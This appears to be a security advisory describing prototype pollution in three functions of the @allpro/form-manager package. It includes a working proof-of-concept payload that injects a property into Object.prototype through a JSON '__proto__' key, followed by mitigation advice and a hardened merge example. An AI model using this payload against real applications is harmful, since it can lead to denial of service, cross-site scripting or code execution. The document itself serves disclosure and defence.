Description
Overview
The module is vulnerable via three functions, located at setDefaults (form-manager/cjs/index.js:1299), mergeBranch (form-manager/cjs/index.js:1249), and Object.setObjectValue (form-manager/cjs/index.js:1536). In all three implementations, properties are assigned from the source object to the destination object without proper protection.
An attacker can exploit these functions to copy a malicious property to the built-in Object.prototype through the special properties __proto__ or constructor.prototype.
Thus, the attacker can use one of these properties to pollute the application logic, which can be escalated to denial of service, remote code execution or cross-site scripting attacks.
PoC:

```js
(async () => {
  const lib = await import('@allpro/form-manager');
  // JSON.parse turns "__proto__" into an own property of the parsed object
  var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
  var victim = {};
  console.log("Before Attack: ", JSON.stringify(victim.__proto__));
  try {
    // uncomment one at a time
    lib.default.defaultsDeep({}, BAD_JSON);
    //lib.default.merge({}, BAD_JSON)
    //lib.default.setObjectValue({}, "__proto__.polluted", true)
  } catch (e) { }
  console.log("After Attack: ", JSON.stringify(victim.__proto__));
  delete Object.prototype.polluted;
})();
```
Output:

```
Before Attack: {}
After Attack: {"polluted":true}
```

Output of a successful fix:

```
Before Attack: {}
After Attack: {}
```

How to prevent:
Assigning or copying a property should only be applied to an own property of the destination object, so checking for that (e.g. using hasOwnProperty) is sufficient. Alternatively, block assignment of the property names __proto__ or constructor. Other recommendations at Snyk.io:
https://learn.snyk.io/lesson/prototype-pollution/#a0a863a5-fd3a-539f-e1ed-a0769f6c6e3b
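As an added example (not code from @allpro/form-manager or from this report), the following deep merge and dotted-path setter apply the two mitigations above: they iterate only own enumerable keys and refuse the names `__proto__`, `constructor` and `prototype`. The function names `safeMerge`, `safeSetPath` and `isUnsafeKey` are this example's own, and the payload inside `pollutionProbe` is constructed to mirror the report's `BAD_JSON`.

```javascript
'use strict';
// Added example, not @allpro/form-manager code: a deep merge and a dotted-path
// setter hardened against prototype pollution. Function names (safeMerge,
// safeSetPath, isUnsafeKey) are this example's own.

// Property names through which a write can reach Object.prototype instead of
// the intended target object.
const UNSAFE_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function isUnsafeKey(key) {
  return UNSAFE_KEYS.has(String(key));
}

function hasOwn(obj, key) {
  return Object.prototype.hasOwnProperty.call(obj, key);
}

// Only plain objects are merged recursively; arrays, Dates and class instances
// are copied by reference like any other value.
function isPlainObject(value) {
  if (value === null || typeof value !== 'object') return false;
  const proto = Object.getPrototypeOf(value);
  return proto === Object.prototype || proto === null;
}

// Deep-merges source into target. Iterates own enumerable keys only and skips
// the unsafe names, so a payload such as {"__proto__":{...}} (which JSON.parse
// turns into an *own* property named "__proto__") never reaches
// target["__proto__"], i.e. the Object.prototype setter.
function safeMerge(target, source) {
  if (!isPlainObject(target)) throw new TypeError('target must be a plain object');
  if (!isPlainObject(source)) return target;
  for (const key of Object.keys(source)) {
    if (isUnsafeKey(key)) continue;
    const value = source[key];
    if (isPlainObject(value)) {
      // Merge into an existing *own* plain object; never into an inherited one.
      if (!hasOwn(target, key) || !isPlainObject(target[key])) target[key] = {};
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Sets obj at a dotted string or array path, e.g. "user.address.city".
// Rejects the whole path if any segment is unsafe rather than silently
// skipping a segment, so the caller cannot end up writing somewhere else.
function safeSetPath(obj, path, value) {
  const keys = Array.isArray(path) ? path.map(String) : String(path).split('.');
  if (keys.length === 0 || keys.some(isUnsafeKey)) {
    throw new Error(`refusing to set unsafe path: ${keys.join('.')}`);
  }
  let cursor = obj;
  for (let i = 0; i < keys.length - 1; i++) {
    const key = keys[i];
    if (!hasOwn(cursor, key) || !isPlainObject(cursor[key])) cursor[key] = {};
    cursor = cursor[key];
  }
  cursor[keys[keys.length - 1]] = value;
  return obj;
}

// Runs the same before/after probe as the report's PoC against the hardened
// functions and reports whether Object.prototype picked up "polluted".
function pollutionProbe() {
  // Constructed payload mirroring the report's BAD_JSON.
  const BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
  const results = {};

  safeMerge({}, BAD_JSON);
  // "in" walks the prototype chain, so a fresh {} would see any pollution.
  results.mergeClean = !('polluted' in {});

  let rejected = false;
  try { safeSetPath({}, '__proto__.polluted', true); } catch (e) { rejected = true; }
  results.setPathRejected = rejected && !('polluted' in {});

  // Ordinary use still works.
  results.legitimateMerge = safeMerge({ a: { x: 1 } }, { a: { y: 2 }, b: 3 });
  results.legitimateSet = safeSetPath({}, 'a.b.c', 7);
  return results;
}

console.log(JSON.stringify(pollutionProbe()));
```

Rejecting an unsafe path with an error, rather than dropping the offending segment, is the deliberate choice here: a silently skipped `__proto__` segment would make `"__proto__.polluted"` write to `obj.polluted`, which is a different location from the one the caller named.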